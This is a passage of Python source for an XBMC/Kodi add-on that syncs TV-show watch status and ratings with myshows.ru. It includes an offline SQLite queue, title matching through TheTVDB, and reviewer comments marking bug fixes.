(\d+)%"></div>.+?<td>\d+</td>.+?<td>(\d+)</td>.+?<td>(.+?)</td>', re.DOTALL | re.MULTILINE) result = reobj.findall(subject) result=sorted(result, key=lambda x: x[1]) result=sorted(result, key=lambda x: int(x[3]), reverse=True) for i in result: showId,title,origtitle,rating,totalep,epunwatched=i[0],i[1],i[2],i[3],i[4],i[5] if origtitle==orig_false: origtitle=title.encode('utf-8') else: origtitle=origtitle.replace(orig_before,'').replace(orig_after,'') #Debug(origtitle) if ruName!='true': title=origtitle title=title.encode('utf-8') rating=float(rating)/10 epunwatched=epunwatched.replace('<span class="useless">','').replace('</span>','') if int(epunwatched)==0: playcount=1 else: playcount=0 listtitle='[%d] %s' %(int(rating)/2, title) item = xbmcgui.ListItem(listtitle, iconImage='DefaultFolder.png',) info={'title': title, 'label':title, 'tvshowtitle': origtitle, 'rating': rating, 'year':'', 'playcount':playcount, 'episode':int(totalep)} if syncshows: item=syncshows.shows(title, 
item, info) else: item.setInfo( type='Video', infoLabels=info ) stringdata={"showId":int(showId), "seasonId":None, "episodeId":None, "id":None} refresh_url='&refresh_url='+urllib.quote_plus('http://api.myshows.ru/profile/shows/') sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&showId=' + showId + '&mode=20' item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True) else: if action==login: menu=[(__language__(30154),sys.argv[0] + '?mode=41&sort=friend&action='+login), (__language__(30124),sys.argv[0] + '?mode=41&sort=friends'), (__language__(30125),sys.argv[0] + '?mode=41&sort=followers')] elif sort!='friend': action=unicode(urllib.unquote_plus(action),'utf-8','ignore') menu=[(__language__(30154), sys.argv[0] + '?action='+action+'&mode=41&sort=friend'), (__language__(30127) % (action), sys.argv[0] + '?action='+action+'&mode=41&sort=friends'), (__language__(30126) % (action), sys.argv[0] + '?action='+action+'&mode=41&sort=followers')] for temmp in menu: sys_url=temmp[1].encode('utf-8') title=temmp[0].encode('utf-8') item = xbmcgui.ListItem(title, iconImage='DefaultFolder.png', thumbnailImage=str(jdata['avatar']+'0')) item.setInfo( type='Video', infoLabels={'Title': title} ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True) if jdata['gender']=='m': stats=[__language__(30128) % (str(jdata['stats']['watchedDays'])), __language__(30129) % (str(jdata['stats']['watchedEpisodes'])), __language__(30130) % (str(jdata['stats']['watchedHours'])), __language__(30131) % (str(jdata['stats']['remainingEpisodes']))] else: stats=[__language__(30132) % (str(jdata['stats']['watchedDays'])), __language__(30133) % (str(jdata['stats']['watchedEpisodes'])), __language__(30134) % (str(jdata['stats']['watchedHours'])), __language__(30135) % (str(jdata['stats']['remainingEpisodes']))] for temmp in stats: 
def Change_Status_Episode(showId, id, action, playcount, refresh_url, selftitle=None):
    """Mark or unmark one episode as watched on myshows.ru.

    When `action` is None it is derived from `playcount` ('0' -> 'check').
    If the API call fails, the change is queued locally in WatchedDB so it
    can be re-sent later.  Always returns False (callers do not treat the
    result as a directory listing).
    """
    Debug('[Change_Status_Episode]:'+str((showId, id, action, playcount, refresh_url, selftitle)))
    if action is None:
        if playcount=='0': action='check'
        else: action='uncheck'
    status_url='http://api.myshows.ru/profile/episodes/'+action+'/'+str(id)
    ok2=Data(cookie_auth, status_url, refresh_url).get()
    if ok2:
        # BUGFIX: str.strip(prefix) strips a *character set* from both ends,
        # not a prefix; use replace() so the notification shows "<action>/<id>".
        showMessage(__language__(30208), status_url.replace('http://api.myshows.ru/profile/episodes/', ''), 70)
        WatchedDB().onaccess()
    else:
        Debug('[Change_Status_Episode]: Not ok2! Starting offline check and adding!')
        if not showId: showId=0
        if not selftitle:
            # Minimal payload the offline queue can replay later.
            selftitle=json.dumps({"myshows_showId":int(showId),"myshows_id":int(id)})
        if action=='check':
            WatchedDB().check(selftitle)
        else:
            try: WatchedDB()._delete(selftitle)
            except: Debug('[Change_Status_Episode] Nothing to delete.'+selftitle)
    return False

def Change_Status_Show(showId, action, refresh_url):
    """Apply a watch-status `action` to a whole show; 'remove' asks first."""
    if action=='remove':
        dialog = xbmcgui.Dialog()
        ret=dialog.yesno(__language__(30209), __language__(30210))
    else:
        ret=True
    if ret:
        ok=Data(cookie_auth, 'http://api.myshows.ru/profile/shows/'+showId+'/'+action, refresh_url).get()
        if ok: showMessage(__language__(30208), showId+'/'+action)

def Change_Status_Season(showId, seasonNumber, action, refresh_url):
    """Apply `action` (check/uncheck) to every episode of one season."""
    data = get_url(cookie_auth, 'http://api.myshows.ru/shows/'+showId)
    jdata = json.loads(data)
    # Collect ids of all episodes belonging to the requested season.
    # IDIOM: build a list and join once instead of the quadratic '+=' loop;
    # this also drops the stray trailing comma from the notification text.
    ids = [str(id) for id in jdata['episodes']
           if seasonNumber == str(jdata['episodes'][id]['seasonNumber'])]
    eps_string = ','.join(ids)
    ok=Data(cookie_auth, 'http://api.myshows.ru/profile/shows/'+showId+'/episodes?'+action+'='+eps_string, refresh_url).get()
    if ok: showMessage(__language__(30208), showId+'/episodes?'+action+'='+eps_string)
def Rate(showId, id, refresh_url, selftitle=None):
    """Ask the user for a 1-5 rating and submit it to myshows.ru.

    id=='0' means "rate the whole show", otherwise a single episode.
    On API failure the rating is queued offline via WatchedDB.check().
    Returns True on success, False when queued offline.
    """
    ratewindow=__settings__.getSetting("ratewindow")
    # Choices shown to the user; index 5 is the localized "cancel" entry.
    rate=['5', '4', '3', '2', '1', unicode(__language__(30205))]
    if id=='0':
        rate_item=__language__(30213)+' '+showId
    else:
        rate_item=__language__(30214)+' '+id
    if ratewindow=='true':
        dialog = xbmcgui.Dialog()
        ret = dialog.select(__language__(30215) % rate_item, rate)
    else:
        ret=rateMedia(showId, id, __language__(30215) % rate_item)
    # NOTE(review): `if ret` discards selection 0, and ret is then shifted by
    # -1 as if it were 1-based.  dialog.select() is 0-based, so the top
    # rating ('5', index 0) appears unselectable on that path -- confirm
    # against rateMedia()'s return convention before changing.
    if ret:
        ret=int(ret)-1
        if ret>-1 and ret<5:
            if id=='0':
                rate_url=('http://api.myshows.ru/profile/shows/'+showId+'/rate/'+rate[ret])
            else:
                rate_url=('http://api.myshows.ru/profile/episodes/rate/'+rate[ret]+'/'+id)
            ok=Data(cookie_auth, rate_url, refresh_url).get()
            if ok:
                # NOTE(review): strip() removes a character *set*, not the URL
                # prefix -- the notification text can lose extra characters.
                showMessage(__language__(30208), rate_url.strip('http://api.myshows.ru/profile/'))
                WatchedDB().onaccess()
            else:
                Debug('[Rate]: Not ok! Starting offline check and adding!')
                if not selftitle:
                    selftitle=json.dumps({"myshows_showId":int(showId),"myshows_id":int(id)})
                WatchedDB().check(selftitle,int(rate[ret]))
                return False
            # Optionally mirror the show rating to kinopoisk.
            if getSettingAsBool('ratekinopoisk') and id=='0' and ok:
                jload=Data(cookie_auth, 'http://api.myshows.ru/shows/'+showId).get()
                if jload:
                    jdata = json.loads(jload)
                    title=jdata['title'].encode('utf-8')
                    try: titleAlt=jdata['ruTitle'].encode('utf-8')
                    except:titleAlt=None
                    year=jdata['year']
                    kinopoiskId=jdata['kinopoiskId']
                    kinorate(title,year,titleAlt,kinopoiskId)
            return True
def FakeRate(title):
    """Rate an item that could not be resolved online; store it offline.

    Only active when the "scrobrate" setting is enabled.  The chosen rating
    (or 0 for "no rating") is queued in WatchedDB for a later sync.
    """
    if getSettingAsBool("scrobrate"):
        ratewindow=__settings__.getSetting("ratewindow")
        rate=['5', '4', '3', '2', '1', unicode(__language__(30205))]
        rate_item=__language__(30520)
        if ratewindow=='true':
            dialog = xbmcgui.Dialog()
            ret = dialog.select(rate_item, rate)
            if ret>-1: ret=int(ret)+1
        else:
            rate_item=titlesync(title)
            ret=rateMedia(None, None, rate_item)
            if ret: ret=int(ret)
            else: ret=False
        # ret: 1..6 from the dialog, int from rateMedia, None, or False.
        if ret>0 and ret<6 or ret==None and not getSettingAsBool("rateandcheck") or ret==False:
            db=WatchedDB()
            if ret==None or ret==False: rating=0
            else: rating=int(rate[int(ret)-1])
            db.check(title,rating)
            return True

def Favorite(id, refresh_url):
    """Add/remove one episode to/from the favorites or ignored lists."""
    dialog = xbmcgui.Dialog()
    items=[__language__(30217), __language__(30218), __language__(30219), __language__(30220), unicode(__language__(30205))]
    # Parallel tables: list name and add/remove verb per menu entry.
    actions_fi=['favorites', 'favorites', 'ignored', 'ignored', '']
    actions_ar=['add', 'remove', 'add', 'remove', '']
    ret = dialog.select(__language__(30216) % id, items)
    if ret!=items.index(unicode(__language__(30205))):
        fav_url=actions_fi[ret]+'/'+actions_ar[ret]+'/'+str(id)
        Data(cookie_auth, 'http://api.myshows.ru/profile/episodes/'+fav_url, refresh_url).get()
        showMessage(__language__(30208), fav_url)

def ContextMenuItems(sys_url, refresh_url, ifstat=None):
    """Build the context-menu entries for the current listing `mode`.

    Each entry is encoded as 'label|:|url' and expanded into the
    [label, 'XBMC.RunPlugin(url)'] pairs that ListItem context menus expect.
    Reads the module-level globals `mode`, `sort` and `action`.
    """
    myshows_dict=[]
    # BUGFIX: initialize menu so an unmatched mode yields an empty context
    # menu instead of raising NameError at the expansion loop below.
    menu=[]
    if mode >= 10 and mode <=19 or mode==100 or sort and mode in (27,28) or mode==41 and sort and action:
        menu=[__language__(30227)+'|:|'+sys_url+'4',
              __language__(30300)+'|:|'+sys_url+'0&action=watching'+refresh_url,
              __language__(30301)+'|:|'+sys_url+'0&action=later'+refresh_url,
              __language__(30302)+'|:|'+sys_url+'0&action=cancelled'+refresh_url,
              __language__(30315)+'|:|'+sys_url+'5',
              __language__(30303)+'|:|'+sys_url+'1&id=0',
              __language__(30304)+'|:|'+sys_url+'0&action=remove'+refresh_url,
              __language__(30319)+'|:|'+sys_url+'6',]
    elif mode==20:
        menu=[__language__(30227)+'|:|'+sys_url+'4',
              __language__(30311)+'|:|'+sys_url+'9',
              __language__(30305)+'|:|'+sys_url+'0&action=check'+refresh_url,
              __language__(30306)+'|:|'+sys_url+'0&action=uncheck'+refresh_url,
              __language__(30319)+'|:|'+sys_url+'6',
              __language__(30315)+'|:|'+sys_url+'5',
              __language__(30310)+'|:|'+sys_url+'201',
              __language__(30318)+'|:|'+sys_url+'71',
              __language__(30228)+'|:|'+sys_url+'7',
              __language__(30314)+'|:|'+sys_url+'8',]
    elif mode==40:
        menu=[__language__(30300)+'|:|'+sys_url+'0&action=watching'+refresh_url,
              __language__(30301)+'|:|'+sys_url+'0&action=later'+refresh_url,
              __language__(30302)+'|:|'+sys_url+'0&action=cancelled'+refresh_url,
              __language__(30319)+'|:|'+sys_url+'6']
    elif mode==25 or not sort and mode in (27,28):
        menu=[__language__(30227)+'|:|'+sys_url+'4',
              __language__(30305)+'|:|'+sys_url+'0&action=check'+refresh_url,
              __language__(30306)+'|:|'+sys_url+'0&action=uncheck'+refresh_url,
              __language__(30317)+'|:|'+sys_url+'2',
              __language__(30319)+'|:|'+sys_url+'6',
              __language__(30308)+'|:|'+sys_url+'1'+refresh_url,
              __language__(30318)+'|:|'+sys_url+'71',
              __language__(30310)+'|:|'+sys_url+'201',
              __language__(30228)+'|:|'+sys_url+'200',]
    elif mode in (50,) and not sort:
        menu=[__language__(30227)+'|:|'+sys_url,
              __language__(30310)+'|:|'+sys_url+'1',
              __language__(30311)+'|:|'+sys_url+'2',
              __language__(30318)+'|:|'+sys_url+'71',
              __language__(30228)+'|:|'+sys_url+'0']
    elif mode==50 and sort:
        menu=[__language__(30314)+'|:|'+sys_url+'0']
    elif mode in (51,):
        menu=[]
        if ifstat==True:
            menu.append(__language__(30312)+'|:|'+sys_url+'02')
        elif ifstat==False:
            menu.append(__language__(30313)+'|:|'+sys_url+'01')
        menu.extend([__language__(30227)+'|:|'+sys_url,
                     __language__(30311)+'|:|'+sys_url+'2',
                     __language__(30318)+'|:|'+sys_url+'71',
                     __language__(30228)+'|:|'+sys_url+'0'])
    for s in menu:
        myshows_dict.append([s.split('|:|')[0],'XBMC.RunPlugin('+s.split('|:|')[1]+')'])
    return myshows_dict
class SyncXBMC():
    """Bridge between the XBMC video library and the myshows.ru profile.

    Two roles: enrich plugin ListItems with metadata from the local XBMC
    library (or TVDB when the 'tvdb' setting is on), and replay a
    'check' (mark-watched) action, resolving a library item to a
    myshows.ru show/episode id.
    """

    def __init__(self, inner=None, rating=None):
        # `title`, `action`, `useTVDB` come from module-level globals.
        self.menu,self.rating,self.title=None,None,title
        self.useTVDB=useTVDB
        if not inner:
            self.action=action
        else:
            # Invoked from the offline queue: `inner` is a JSON payload.
            self.action='check'
            self.title=str(inner)
            self.rating=rating
        self.jloadshows=Data(cookie_auth, 'http://api.myshows.ru/profile/shows/').get()
        if self.jloadshows:
            self.jdatashows = json.loads(self.jloadshows)
        else:
            return
        if self.action in ['check']:
            self.match=json.loads(self.title)
        if self.useTVDB:
            from search.scrapers import Scrapers
            self.TVDB=Scrapers()
        else:
            self.menu=self.GetFromXBMC()

    def doaction_simple(self):
        """Resolve self.match to (showId, episode id) via title/date/SxxEyy."""
        id=None
        showId=None
        if self.match and 'showtitle' in self.match:
            showId=self.showtitle2showId()
        if self.match and 'date' in self.match and not 'episode' in self.match:
            id, self.match['season'],self.match['episode']=date2SE(showId, self.match['date'])
        if showId:
            if 'season' in self.match and 'episode' in self.match:
                Debug('[doaction] Getting the id of S%sE%s' % (str(self.match['season']),str(self.match['episode'])))
                id=self.getid(showId, self.match['season'],self.match['episode'],self.match['label'])
        Debug('[doaction][showId]: '+str(showId)+' [doaction][id]: '+str(id))
        return showId, id

    def doaction(self):
        """Perform the pending 'check' action: rate and/or mark watched.

        Returns 1 when an explicit offline rating was replayed; otherwise
        falls through (None) after delegating to Change_Status_Episode.
        """
        friend_xbmc()
        if self.action=='check':
            if 'myshows_id' in self.match:
                # Offline-queue payload already carries both ids.
                showId, id=self.match['myshows_showId'],self.match['myshows_id']
            else:
                showId, id=self.doaction_simple()
                if __settings__.getSetting("label")=='true' and not id:
                    if 'file' in self.match:
                        self.match['label']=self.match['file']
                    idlist=[]
                    # Strip the directory part when the label is a media filename.
                    if 'label' in self.match and re.search('.*?\.avi|mp4|mkv|flv|mov|vob|wmv|ogm|asx|mpg|mpeg|avc|vp3|fli|flc|m4v$', self.match['label'], re.I | re.DOTALL):
                        self.match['label']=self.match['label'].replace(os.path.dirname(self.match['label']),'').encode('utf-8','ignore').lstrip('\\/')
                    self.old_match=self.match
                    self.match=filename2match(self.match['label'])
                    showId, id=self.doaction_simple()
                    if not id:
                        # Last resort: let myshows.ru guess from the filename.
                        Debug('[doaction] Trying to find filename on myshows.ru: '+self.old_match['label'])
                        data=Data(cookie_auth, 'http://api.myshows.ru/shows/search/file/?q='+urllib.quote_plus(self.old_match['label'])).get()
                        if data:
                            jdata=json.loads(data)
                            showId=jdata['show']['id']
                            ids=jdata['show']['episodes']
                            for x in ids:
                                idlist.append(x)
                            if len(idlist)==1:
                                id=idlist[0]
            if showId or id:
                if not id and 'season' in self.match and 'episode' in self.match:
                    Debug('[doaction2] Getting the id of S%sE%s' % (str(self.match['season']),str(self.match['episode'])))
                    id=self.getid(showId, self.match['season'],self.match['episode'],self.match['label'])
                if id:
                    if self.rating:
                        rate_url=('http://api.myshows.ru/profile/episodes/rate/'+str(self.rating)+'/'+str(id))
                        d=Data(cookie_auth, rate_url, 'http://api.myshows.ru/profile/shows/'+str(showId)+'/').get()
                    if self.rating or self.rating==0:
                        # Offline replay path: mark watched and report success.
                        status_url='http://api.myshows.ru/profile/episodes/check/'+str(id)
                        c=Data(cookie_auth, status_url, 'http://api.myshows.ru/profile/shows/'+str(showId)+'/').get()
                        return 1
                    rateOK, scrobrate, rateandcheck=False, __settings__.getSetting("scrobrate"), __settings__.getSetting("rateandcheck")
                    if scrobrate=='true':
                        rateOK=Rate(str(showId), str(id), 'http://api.myshows.ru/profile/shows/'+str(showId)+'/', self.title)
                    else:
                        rateOK=True
                    if rateOK or rateandcheck=='false':
                        # New or non-watching show: switch it to 'watching' first.
                        if str(showId) not in self.jdatashows or self.jdatashows[str(showId)]['watchStatus']!='watching':
                            Change_Status_Show(str(showId), 'watching', 'http://api.myshows.ru/profile/shows/')
                            xbmc.sleep(500)
                        # NOTE(review): passes the *global* `action`, not
                        # self.action -- looks intentional for the plugin
                        # entry point, but verify for the offline-queue path.
                        Change_Status_Episode(showId, id, action, '0', 'http://api.myshows.ru/profile/shows/'+str(showId)+'/', self.title)

    def showtitle2showId(self):
        """Map a show title (ru or original) to a myshows.ru show id.

        Checks the user's profile first, then the search API, then TVDB
        (when a tvdb_id is present); asks the user when ambiguous.
        """
        try:showtitle=self.match['showtitle'].decode('utf-8','ignore')
        except:showtitle=self.match['showtitle']
        if 'tvdb_id' in self.match:
            tvdb_id=self.match['tvdb_id']
        else:
            tvdb_id=None
        for showId in self.jdatashows:
            if showtitle==self.jdatashows[showId]['ruTitle'] or showtitle==self.jdatashows[showId]['title']:
                return int(showId)
        Debug('[showtitle2showId] '+unicode(showtitle))
        jload=Data(cookie_auth, 'http://api.myshows.ru/shows/search/?q=%s' % urllib.quote_plus(showtitle.encode('utf-8', 'ignore'))).get()
        if jload:
            jdata = json.loads(jload)
            Debug('[showtitle2showId] Search '+unicode(jload))
        else:
            if tvdb_id:
                # Retry the search with the English title from thetvdb.com.
                html=get_html_source("http://thetvdb.com/api/33DBB309BB2B0ADB/series/%s/en.xml" % tvdb_id)
                if re.findall('<SeriesName>(.+?)</SeriesName>', html, re.DOTALL)[0]:
                    showtitle=re.findall('<SeriesName>(.+?)</SeriesName>', html, re.DOTALL)[0]
                    Debug('[showtitle2showId] After [tvdb_id] '+showtitle)
                    jload=Data(cookie_auth, 'http://api.myshows.ru/shows/search/?q=%s' % urllib.quote_plus(showtitle.encode('utf-8', 'ignore'))).get()
                    if jload:
                        jdata = json.loads(jload)
                    else:
                        return
        select_show=[]
        showIds=[]
        for showId in jdata:
            select_show.append((jdata[showId]['title'], showId, int(jdata[showId]['watching'])))
            if unicode(showtitle).lower()==unicode(jdata[showId]['ruTitle']).lower() or unicode(showtitle).lower()==unicode(jdata[showId]['title']).lower():
                showIds.append(showId)
                theshowId=showId
        if len(showIds)==1:
            return int(theshowId)
        # Ambiguous: offer candidates sorted by watcher count.
        select_show=sorted(select_show, key=lambda x: x[2], reverse=True)
        showtitles=[]
        showIds=[]
        showId=None
        for x in select_show:
            showtitles.append(x[0])
            showIds.append(x[1])
        if len(showIds)==1:
            showId=int(showIds[0])
        else:
            dialog = xbmcgui.Dialog()
            ret = dialog.select(unicode(__language__(30289)), showtitles)
            if ret!=-1:
                showId=int(showIds[ret])
        if showId:
            return showId

    def getid(self, showId, seasonNumber, episodeId, lable=None):
        """Resolve (season, episode) or an episode title to a myshows episode id."""
        data= Data(cookie_auth, 'http://api.myshows.ru/shows/'+str(showId)).get()
        jdata = json.loads(data)
        if seasonNumber and int(seasonNumber)>0 and episodeId:
            for id in jdata['episodes']:
                if jdata['episodes'][id]['seasonNumber']==int(seasonNumber) and jdata['episodes'][id]['episodeNumber']==int(episodeId):
                    return int(id)
        episodes=[]
        for id in jdata['episodes']:
            episodes.append((id, jdata['episodes'][id]['title'], jdata['episodes'][id]['seasonNumber']))
            if lable and jdata['episodes'][id]['title']==lable:
                return int(id)
        if len(episodes)==1:
            # BUGFIX: was `int(episodes)` -- int() of a list always raises
            # TypeError; return the id of the single candidate instead.
            return int(episodes[0][0])
        episodes=sorted(episodes, key=lambda x: x[0], reverse=True)
        eptitles=[]
        ids=[]
        for x in episodes:
            eptitles.append('S'+int_xx(x[2])+' '+x[1])
            ids.append(x[0])
        dialog = xbmcgui.Dialog()
        ret = dialog.select(unicode(__language__(30289)), eptitles)
        if ret!=-1:
            return int(ids[ret])

    def get_menu(self):
        """Return the cached XBMC library snapshot, fetching it on first use."""
        if self.menu:
            return self.menu
        else:
            return self.GetFromXBMC()

    def list(self):
        """Debug helper: list every library show as a plugin directory item."""
        self.menu=self.get_menu()
        for i in self.menu:
            item = xbmcgui.ListItem(i['title'], iconImage='DefaultFolder.png', thumbnailImage=i['thumbnail'])
            item=self.shows(i['title'],item)
            xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url='', listitem=item, isFolder=True)

    def shows(self, title, item, info=None, avatar=False):
        """Enrich a show ListItem with TVDB or local-library metadata."""
        if not self.menu and not self.useTVDB:
            return item
        if self.useTVDB:
            try:info['title']=info['title'].decode('utf-8','ignore')
            except:pass
            try:info['tvshowtitle']=info['tvshowtitle'].decode('utf-8','ignore')
            except:pass
            meta=self.TVDB.scraper('tvdb', {'label':info['title'], 'search':[info['tvshowtitle'],info['title']], 'year':info['year']})
            if not meta:
                return item
            item=self.itemTVDB(item,meta,avatar)
            try:
                # Caller-supplied info wins over scraped metadata.
                if 'title' in info: meta['info']['title']=info['title']
                if 'rating' in info: meta['info']['rating']=info['rating']
                if 'votes' in info: meta['info']['votes']=info['votes']
                if 'plot' in info: meta['info']['plot']=meta['info']['plot'].replace('&quot;','"')+'\r\n'+info['plot']
                elif 'plot' in meta['info'] and meta['info']['plot']: meta['info']['plot']=meta['info']['plot'].replace('&quot;','"')
                if 'playcount' in info: meta['info']['playcount']=info['playcount']
                if 'episode' in info: meta['info']['episode']=info['episode']
            except:pass
            item.setInfo(type='Video', infoLabels=meta['info'] )
            return item
        self.menu=self.get_menu()
        for i in range(len(self.menu)):
            try:
                if title in self.menu[i]['title']:
                    item.setProperty('fanart_image', self.menu[i]['fanart'])
                    # Flatten the studio/genre lists into comma-separated strings.
                    for studio_info in self.menu[i]['studio']:
                        try: studio+=', '+studio_info
                        except: studio=studio_info
                    self.menu[i]['studio']=studio.encode('utf-8')
                    for genre_info in self.menu[i]['genre']:
                        try: genre+=', '+genre_info
                        except: genre=genre_info
                    self.menu[i]['genre']=genre.encode('utf-8')
                    if info:
                        self.menu[i]['title']=info['title']
                        self.menu[i]['playcount']=0
                        self.menu[i]['plot']=info['plot']+self.menu[i]['plot']
                    break
            except:pass
        try: item.setInfo( type='Video', infoLabels=self.menu[i] )
        except: item.setInfo( type='Video', infoLabels=info)
        return item

    def episodes_meta(self, info):
        """Fetch TVDB metadata plus season banners for an episode listing."""
        meta=self.TVDB.scraper('tvdb', {'label':info['label'], 'search':info['label'], 'year':str(info['year'])})
        if not meta:
            return
        banners=self.TVDB.scraper('tvdb', {'label':info['label'], 'search':info['label'], 'year':str(info['year']), 'season':True})
        return meta, banners

    def episodes(self, title, item, info, meta=None):
        """Enrich an episode ListItem with TVDB or local-library metadata."""
        if not self.menu and not self.useTVDB:
            return item
        if self.useTVDB and meta:
            item=self.itemTVDB(item,meta)
            try:
                meta['info']['title']=info['title']
                meta['info']['rating']=info['rating']
                meta['info']['votes']=info['votes']
                if 'playcount' in info: meta['info']['playcount']=info['playcount']
                if 'plot' in info and info['plot']: meta['info']['plot']=info['plot']
            except:pass
            item.setInfo(type='Video', infoLabels=meta['info'] )
            return item
        self.menu=self.get_menu()
        for i in range(len(self.menu)):
            if title in self.menu[i]['title']:
                item.setProperty('fanart_image', self.menu[i]['fanart'])
                break
        item.setInfo( type='Video', infoLabels=info )
        return item

    def episode(self, title, seasonId, episodeNumber):
        """Return True when the episode exists in the local XBMC library."""
        self.menu=self.get_menu()
        if not self.menu:
            return False
        for i in range(len(self.menu)):
            if title in self.menu[i]['title']:
                for episode in self.menu[i]['episodes']:
                    if episode['episode']==episodeNumber and episode['season']==seasonId:
                        return True
        return False

    def episode_fanart(self, info):
        """Return a fanart URL for the episode's show, or '' when unknown."""
        if self.useTVDB:
            meta=self.TVDB.scraper('tvdb', {'label':info['label'], 'search':info['label'], 'year':str(info['year'])})
            if not meta:
                return ''
            else:
                return meta['properties']['fanart_image']
        self.menu=self.get_menu()
        if not self.menu:
            return ''
        for i in range(len(self.menu)):
            try:
                if info['title'] in self.menu[i]['title']:
                    return self.menu[i]['fanart']
            except:pass
        return ''

    def GetFromXBMC(self):
        """Snapshot all TV shows (with episodes) from the XBMC JSON-RPC API."""
        from utilities import xbmcJsonRequest
        Debug('[Episodes Sync] Getting episodes from XBMC')
        shows = xbmcJsonRequest({'jsonrpc': '2.0', 'method': 'VideoLibrary.GetTVShows', 'params': {'properties': ['title', 'originaltitle', 'genre', 'year', 'rating', 'plot', 'studio', 'mpaa', 'cast', 'imdbnumber', 'premiered', 'votes', 'fanart', 'thumbnail', 'episodeguide', 'playcount', 'season', 'episode', 'tag']}, 'id': 0})
        # Sanity check: empty result.
        if not shows:
            Debug('[Episodes Sync] xbmc json request was empty.')
            return
        if 'tvshows' in shows:
            shows = shows['tvshows']
        else:
            Debug("[Episodes Sync] Key 'tvshows' not found")
            return
        for show in shows:
            show['episodes'] = []
            episodes = xbmcJsonRequest({'jsonrpc': '2.0', 'method': 'VideoLibrary.GetEpisodes', 'params': {'tvshowid': show['tvshowid'], 'properties': ['season', 'episode', 'playcount', 'uniqueid', 'file']}, 'id': 0})
            if 'episodes' in episodes:
                episodes = episodes['episodes']
                show['episodes'] = [x for x in episodes if type(x) == type(dict())]
        self.xbmc_shows = [x for x in shows if x['episodes']]
        return shows

    def itemTVDB(self, item, kwarg, avatar=False):
        """Copy scraped label/art/properties onto a ListItem; keep avatar art."""
        if 'title' in kwarg and kwarg['title']: item.setLabel(kwarg['title'])
        if 'label' in kwarg and kwarg['label']: item.setLabel2(kwarg['label'])
        if not avatar and 'icon' in kwarg and kwarg['icon']: item.setIconImage(kwarg['icon'])
        if not avatar and 'thumbnail' in kwarg and kwarg['thumbnail']: item.setThumbnailImage(kwarg['thumbnail'])
        if 'properties' in kwarg and kwarg['properties']:
            for key, value in kwarg['properties'].iteritems():
                item.setProperty(key, str(value))
        return item
class WatchedDB:
    """Small sqlite-backed offline queue of watched/rated items.

    Rows are (addtime, rating, id) where `id` is a JSON payload (quotes
    escaped as '<&amp>').  Queued entries are replayed by onaccess() when
    the API becomes reachable again.
    """

    def __init__(self):
        dirname = xbmc.translatePath('special://temp')
        for subdir in ('xbmcup', sys.argv[0].replace('plugin://', '').replace('/', '')):
            dirname = os.path.join(dirname, subdir)
            if not xbmcvfs.exists(dirname):
                xbmcvfs.mkdir(dirname)
        self.dbfilename = os.path.join(dirname, 'data.db3')
        if not xbmcvfs.exists(self.dbfilename):
            creat_db(self.dbfilename)
        self.dialog = xbmcgui.Dialog()

    def _get(self, id):
        """Return the stored rating for `id`, or None when not queued."""
        self._connect()
        Debug('[WatchedDB][_get]: Checking '+id)
        # Same escaping as _add/_delete so lookups match stored rows.
        id=id.replace("'","<&amp>").decode('utf-8','ignore')
        # SECURITY/IDIOM: parameterized query instead of string-built SQL.
        try:
            self.cur.execute('select rating from watched where id=?', (id,))
        except:
            # First use: table does not exist yet.
            self.cur.execute('create table watched(addtime integer, rating integer, id varchar(32) PRIMARY KEY)')
            self.cur.execute('select rating from watched where id=?', (id,))
        res=self.cur.fetchone()
        self._close()
        return res[0] if res else None

    def _get_all(self):
        """Return all queued [id, rating] pairs, newest first."""
        self._connect()
        self.cur.execute('select id, rating from watched order by addtime desc')
        res = [[unicode(x[0]).replace("<&amp>","'").encode('utf-8','ignore'),x[1]] for x in self.cur.fetchall()]
        self._close()
        return res

    def check(self, id, rating=0):
        """Queue (or re-queue) `id` with `rating`, confirming per settings."""
        ok1,ok3=None,None
        db_rating=self._get(id)
        title=titlesync(id)
        if getSettingAsBool("silentoffline"):
            if db_rating==None and rating>=0:
                showMessage(__language__(30520),__language__(30522) % (str(rating)))
                ok1=True
            elif db_rating>=0 and rating!=db_rating:
                showMessage(__language__(30520),__language__(30523) % (str(rating)))
                ok3=True
            elif db_rating!=None and rating==db_rating:
                showMessage(__language__(30520),__language__(30524) % (str(rating)))
        else:
            if db_rating==None and rating>=0:
                ok1=self.dialog.yesno(__language__(30520),__language__(30525) % (str(rating)), str(title))
            elif db_rating and rating!=db_rating:
                ok3=self.dialog.yesno(__language__(30520),__language__(30526) % (str(db_rating), str(rating)),str(title))
            elif db_rating==0 and rating!=db_rating:
                ok3=True
            elif db_rating!=None and rating==db_rating:
                showMessage(__language__(30520),__language__(30527) % (str(rating)))
        Debug('[WatchedDB][check]: rating: %s DB: %s, ok1: %s, ok3: %s' % (str(rating), str(db_rating), str(ok1), str(ok3)))
        if ok1:
            self._add(id, rating)
            return True
        if ok3:
            # Rating changed: replace the queued row.
            self._delete(id)
            self._add(id, rating)
            return True

    def onaccess(self):
        """Replay (or discard) queued entries; returns the queue size."""
        self._connect()
        self.cur.execute('select count(id) from watched')
        x=self.cur.fetchone()
        res=int(x[0])
        self._close()
        i=0
        if res>0:
            silentofflinesend=getSettingAsBool('silentofflinesend')
            if not silentofflinesend:
                ok2=self.dialog.yesno(__language__(30521),__language__(30528) % (str(res)), __language__(30529))
            else:
                ok2=True
            if ok2:
                for id,rating in self._get_all():
                    j=SyncXBMC(id,int(rating)).doaction()
                    # BUGFIX: doaction() may fall through and return None;
                    # int(None) raised TypeError and aborted the replay loop.
                    i=i+int(j or 0)
                    self._delete(id)
                showMessage(__language__(30521),__language__(30530) % (i))
            else:
                ok2=self.dialog.yesno(__language__(30521),__language__(30531) % (str(res)))
                if ok2:
                    for id,rating in self._get_all():
                        self._delete(id)
        return res

    def _add(self, id, rating=0):
        self._connect()
        id=id.replace("'","<&amp>").decode('utf-8','ignore')
        Debug('[WatchedDB][_add]: Adding %s with rate %d' % (id, rating))
        self.cur.execute('insert into watched(addtime, rating, id) values(?,?,?)', (int(time.time()), int(rating), id))
        self.db.commit()
        self._close()

    def _delete(self, id):
        self._connect()
        id=id.replace("'","<&amp>").decode('utf-8','ignore')
        # SECURITY: was string-concatenated SQL; use a bound parameter.
